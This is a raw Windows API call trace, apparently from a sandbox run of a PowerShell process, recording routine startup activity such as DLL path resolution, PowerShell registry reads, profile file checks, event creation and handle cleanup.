	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.607] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.608] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.612] GetLastError () returned 0xcb
	[0230.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.612] GetLastError () returned 0xcb
	[0230.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.612] GetLastError () returned 0xcb
	[0230.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.612] GetLastError () returned 0xcb
	[0230.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.613] GetLastError () returned 0xcb
	[0230.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.782] GetLastError () returned 0xcb
	[0230.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.782] GetLastError () returned 0xcb
	[0230.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.782] GetLastError () returned 0xcb
	[0230.782] VirtualQuery (in: lpAddress=0x10d5d8, lpBuffer=0x10e5d8, dwLength=0x1c | out: lpBuffer=0x10e5d8*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.783] GetLastError () returned 0xcb
	[0230.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.783] GetLastError () returned 0xcb
	[0230.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.784] GetLastError () returned 0xcb
	[0230.784] VirtualQuery (in: lpAddress=0x10d5d0, lpBuffer=0x10e5d0, dwLength=0x1c | out: lpBuffer=0x10e5d0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.784] VirtualQuery (in: lpAddress=0x10d284, lpBuffer=0x10e284, dwLength=0x1c | out: lpBuffer=0x10e284*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.784] VirtualQuery (in: lpAddress=0x10d284, lpBuffer=0x10e284, dwLength=0x1c | out: lpBuffer=0x10e284*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ed0c | out: phkResult=0x10ed0c*=0x1f8) returned 0x0
	[0230.786] RegQueryValueExW (in: hKey=0x1f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ed54, lpData=0x0, lpcbData=0x10ed50*=0x0 | out: lpType=0x10ed54*=0x1, lpData=0x0, lpcbData=0x10ed50*=0x56) returned 0x0
	[0230.786] RegQueryValueExW (in: hKey=0x1f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ed54, lpData=0x5090b0, lpcbData=0x10ed50*=0x56 | out: lpType=0x10ed54*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10ed50*=0x56) returned 0x0
	[0230.786] RegCloseKey (hKey=0x1f8) returned 0x0
	[0230.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ed0c | out: phkResult=0x10ed0c*=0x1f8) returned 0x0
	[0230.786] RegQueryValueExW (in: hKey=0x1f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ed54, lpData=0x0, lpcbData=0x10ed50*=0x0 | out: lpType=0x10ed54*=0x1, lpData=0x0, lpcbData=0x10ed50*=0x56) returned 0x0
	[0230.787] RegQueryValueExW (in: hKey=0x1f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ed54, lpData=0x5090b0, lpcbData=0x10ed50*=0x56 | out: lpType=0x10ed54*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10ed50*=0x56) returned 0x0
	[0230.787] RegCloseKey (hKey=0x1f8) returned 0x0
	[0230.866] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5090b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0230.868] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0230.868] GetLastError () returned 0x3f0
	[0230.868] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5090b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0230.868] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0230.868] GetLastError () returned 0x3f0
	[0230.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0230.869] GetLastError () returned 0x3f0
	[0230.869] SetErrorMode (uMode=0x1) returned 0x1
	[0230.869] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10edbc | out: lpFileInformation=0x10edbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.870] GetLastError () returned 0x2
	[0230.870] SetErrorMode (uMode=0x1) returned 0x1
	[0230.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0230.870] GetLastError () returned 0x2
	[0230.870] SetErrorMode (uMode=0x1) returned 0x1
	[0230.870] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10edbc | out: lpFileInformation=0x10edbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.870] GetLastError () returned 0x2
	[0230.870] SetErrorMode (uMode=0x1) returned 0x1
	[0230.870] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0230.870] GetLastError () returned 0x2
	[0230.870] SetErrorMode (uMode=0x1) returned 0x1
	[0230.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10edbc | out: lpFileInformation=0x10edbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.870] GetLastError () returned 0x3
	[0230.870] SetErrorMode (uMode=0x1) returned 0x1
	[0230.870] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0230.870] GetLastError () returned 0x3
	[0230.870] SetErrorMode (uMode=0x1) returned 0x1
	[0230.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10edbc | out: lpFileInformation=0x10edbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0230.870] GetLastError () returned 0x3
	[0230.870] SetErrorMode (uMode=0x1) returned 0x1
	[0230.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.871] GetLastError () returned 0xcb
	[0230.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.874] GetLastError () returned 0xcb
	[0230.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.876] GetLastError () returned 0xcb
	[0230.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.878] GetLastError () returned 0xcb
	[0230.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.879] GetLastError () returned 0xcb
	[0230.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.892] GetLastError () returned 0xcb
	[0230.892] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1fc
	[0230.892] GetLastError () returned 0x0
	[0230.892] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x200
	[0230.892] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x35c
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x364
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0230.893] GetLastError () returned 0x0
	[0230.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0230.893] GetLastError () returned 0x0
	[0230.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.895] GetLastError () returned 0xcb
	[0230.982] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0230.982] GetLastError () returned 0xcb
	[0230.982] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x10edfc | out: lpMode=0x10edfc) returned 1
	[0230.983] GetLastError () returned 0xcb
	[0230.983] SetEvent (hEvent=0x3c8) returned 1
	[0230.983] GetLastError () returned 0xcb
	[0230.984] SetEvent (hEvent=0x1fc) returned 1
	[0230.984] GetLastError () returned 0xcb
	[0230.984] SetEvent (hEvent=0x200) returned 1
	[0230.984] GetLastError () returned 0xcb
	[0230.984] SetEvent (hEvent=0x3c4) returned 1
	[0230.984] GetLastError () returned 0xcb
	[0230.984] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370
	[0230.984] GetLastError () returned 0x0
	[0230.985] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ec60 | out: phkResult=0x10ec60*=0x374) returned 0x0
	[0230.985] RegQueryValueExW (in: hKey=0x374, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10eca8, lpData=0x0, lpcbData=0x10eca4*=0x0 | out: lpType=0x10eca8*=0x0, lpData=0x0, lpcbData=0x10eca4*=0x0) returned 0x2

Thread:
	id = 237
	os_tid = 0xa50


Thread:
	id = 240
	os_tid = 0xb6c


Thread:
	id = 241
	os_tid = 0x9c8


Thread:
	id = 246
	os_tid = 0x5e4


Thread:
	id = 249
	os_tid = 0xc04

	[0198.460] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0223.690] LocalFree (hMem=0x5118f8) returned 0x0
	[0223.690] GetLastError () returned 0x0
	[0223.690] CloseHandle (hObject=0x358) returned 1
	[0223.690] GetLastError () returned 0x0
	[0223.690] CloseHandle (hObject=0x13) returned 1
	[0223.691] GetLastError () returned 0x0
	[0223.691] CloseHandle (hObject=0xf) returned 1
	[0223.691] GetLastError () returned 0x0
	[0223.691] RegCloseKey (hKey=0x33c) returned 0x0
	[0223.691] RegCloseKey (hKey=0x338) returned 0x0
	[0223.691] RegCloseKey (hKey=0x334) returned 0x0
	[0223.692] LocalFree (hMem=0x511918) returned 0x0
	[0223.692] GetLastError () returned 0x0
	[0223.692] RegCloseKey (hKey=0x35c) returned 0x0
	[0224.971] RegCloseKey (hKey=0x35c) returned 0x0
	[0228.138] RegCloseKey (hKey=0x3ac) returned 0x0
	[0228.138] RegCloseKey (hKey=0x3a8) returned 0x0
	[0228.139] RegCloseKey (hKey=0x3a4) returned 0x0
	[0228.139] RegCloseKey (hKey=0x338) returned 0x0
	[0228.139] RegCloseKey (hKey=0x3d8) returned 0x0
	[0228.139] RegCloseKey (hKey=0x3d4) returned 0x0
	[0228.140] RegCloseKey (hKey=0x39c) returned 0x0
	[0228.140] RegCloseKey (hKey=0x398) returned 0x0
	[0228.140] RegCloseKey (hKey=0x394) returned 0x0
	[0228.141] RegCloseKey (hKey=0x390) returned 0x0
	[0228.141] RegCloseKey (hKey=0x38c) returned 0x0
	[0228.141] RegCloseKey (hKey=0x388) returned 0x0
	[0228.142] RegCloseKey (hKey=0x384) returned 0x0
	[0228.142] RegCloseKey (hKey=0x380) returned 0x0
	[0228.142] RegCloseKey (hKey=0x3d0) returned 0x0
	[0228.143] RegCloseKey (hKey=0x378) returned 0x0
	[0228.143] RegCloseKey (hKey=0x374) returned 0x0
	[0228.143] RegCloseKey (hKey=0x370) returned 0x0
	[0228.143] RegCloseKey (hKey=0x36c) returned 0x0
	[0228.144] RegCloseKey (hKey=0x368) returned 0x0
	[0228.144] RegCloseKey (hKey=0x364) returned 0x0
	[0228.144] RegCloseKey (hKey=0x358) returned 0x0
	[0228.145] RegCloseKey (hKey=0x33c) returned 0x0
	[0228.145] RegCloseKey (hKey=0x3cc) returned 0x0
	[0228.145] RegCloseKey (hKey=0x334) returned 0x0
	[0228.145] RegCloseKey (hKey=0x35c) returned 0x0
	[0228.146] RegCloseKey (hKey=0x3c8) returned 0x0
	[0228.146] RegCloseKey (hKey=0x3c4) returned 0x0
	[0228.146] RegCloseKey (hKey=0x3a0) returned 0x0
	[0228.146] RegCloseKey (hKey=0x3dc) returned 0x0
	[0228.147] RegCloseKey (hKey=0x3bc) returned 0x0
	[0228.147] RegCloseKey (hKey=0x3b8) returned 0x0
	[0228.147] RegCloseKey (hKey=0x3b4) returned 0x0
	[0228.148] RegCloseKey (hKey=0x3b0) returned 0x0
	[0231.406] RegCloseKey (hKey=0x374) returned 0x0
	[0238.148] CloseHandle (hObject=0x3d8) returned 1
	[0238.148] GetLastError () returned 0x0
	[0238.149] CloseHandle (hObject=0x3d4) returned 1
	[0238.149] GetLastError () returned 0x0
	[0238.149] CloseHandle (hObject=0x39c) returned 1
	[0238.149] GetLastError () returned 0x0
	[0238.149] CloseHandle (hObject=0x398) returned 1
	[0238.149] GetLastError () returned 0x0
	[0238.150] CloseHandle (hObject=0x394) returned 1
	[0238.150] GetLastError () returned 0x0
	[0238.150] CloseHandle (hObject=0x38c) returned 1
	[0238.150] GetLastError () returned 0x0
	[0238.151] CloseHandle (hObject=0x390) returned 1
	[0238.151] GetLastError () returned 0x0
	[0238.152] CloseHandle (hObject=0x3ec) returned 1
	[0238.152] GetLastError () returned 0x0
	[0238.152] CloseHandle (hObject=0x374) returned 1
	[0238.152] GetLastError () returned 0x0
	[0238.152] CloseHandle (hObject=0x3e8) returned 1
	[0238.152] GetLastError () returned 0x0
	[0258.322] CoGetContextToken (in: pToken=0x4aefa38 | out: pToken=0x4aefa38) returned 0x0
	[0258.322] CoGetContextToken (in: pToken=0x4aef9c8 | out: pToken=0x4aef9c8) returned 0x0
	[0258.322] WbemLocator:IUnknown:Release (This=0x6080bf0) returned 0x0
	[0258.322] CoGetContextToken (in: pToken=0x4aef9c8 | out: pToken=0x4aef9c8) returned 0x0
	[0258.322] IUnknown:Release (This=0x608d4a0) returned 0x1
	[0258.323] CoGetContextToken (in: pToken=0x4aef994 | out: pToken=0x4aef994) returned 0x0
	[0258.323] WbemLocator:IUnknown:Release (This=0x586c4c) returned 0x1
	[0258.323] IUnknown:Release (This=0x608cb34) returned 0x0

Thread:
	id = 311
	os_tid = 0xcc4


Thread:
	id = 315
	os_tid = 0xcd4

	[0231.079] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0231.210] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0231.217] VirtualQuery (in: lpAddress=0x5fae460, lpBuffer=0x5faf460, dwLength=0x1c | out: lpBuffer=0x5faf460*(BaseAddress=0x5fae000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0231.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.225] GetLastError () returned 0xcb
	[0231.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.231] GetLastError () returned 0xcb
